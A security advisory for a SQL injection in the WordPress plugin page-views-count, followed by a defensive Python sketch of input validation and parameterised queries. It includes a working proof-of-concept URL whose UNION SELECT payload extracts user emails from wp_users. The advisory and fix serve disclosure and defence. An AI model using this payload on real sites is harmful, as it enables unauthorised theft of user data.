The plugin does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint that is available to both unauthenticated and authenticated users. As a result, unauthenticated attackers could perform SQL injection attacks.
https://example.com/?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20user_email,user_email,user_email%20from%20wp_users%20--%20g
CPE Name | Operator | Version |
---|---|---|
page-views-count | lt | 2.4.15 |
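
The missing control for a parameter like post_ids is strict integer-list validation followed by bound placeholders. The sketch below is an added example, not the plugin's code: Python and SQLite stand in for PHP and MySQL, and the table name `pvc_total`, the function names and the sample rows are assumptions made for illustration.

```python
import sqlite3

# Decoded post_ids value from the request shown on this page.
PAGE_PAYLOAD = "0) union select user_email,user_email,user_email from wp_users -- g"

def parse_post_ids(raw, limit=100):
    """Turn '1,2,3' into [1, 2, 3]; raise ValueError on anything else."""
    ids = []
    for part in raw.split(","):
        part = part.strip()
        # ASCII digits only: no signs, parentheses, spaces or SQL keywords.
        if not (part.isascii() and part.isdigit()):
            raise ValueError(f"invalid post id: {part!r}")
        ids.append(int(part))
    if len(ids) > limit:
        raise ValueError(f"too many post ids (max {limit})")
    return ids

def fetch_view_counts(db, raw_post_ids):
    """Look up counters with one bound placeholder per validated id."""
    ids = parse_post_ids(raw_post_ids)
    placeholders = ",".join("?" * len(ids))
    sql = ("SELECT post_id, views FROM pvc_total "
           f"WHERE post_id IN ({placeholders}) ORDER BY post_id")
    return db.execute(sql, ids).fetchall()

def demo_db():
    """Constructed sample data; pvc_total is a hypothetical table name."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pvc_total (post_id INTEGER PRIMARY KEY, views INTEGER);
        INSERT INTO pvc_total VALUES (1, 10), (2, 25);
        CREATE TABLE wp_users (user_email TEXT);
        INSERT INTO wp_users VALUES ('admin@example.com');
    """)
    return db

def rejected(raw_post_ids):
    """True when the input never reaches the database."""
    try:
        fetch_view_counts(demo_db(), raw_post_ids)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print(fetch_view_counts(demo_db(), "1, 2"))
    print(rejected(PAGE_PAYLOAD))
```

In WordPress itself the same two steps map to `wp_parse_id_list()` or `absint()` on the input and `$wpdb->prepare()` with one `%d` placeholder per id.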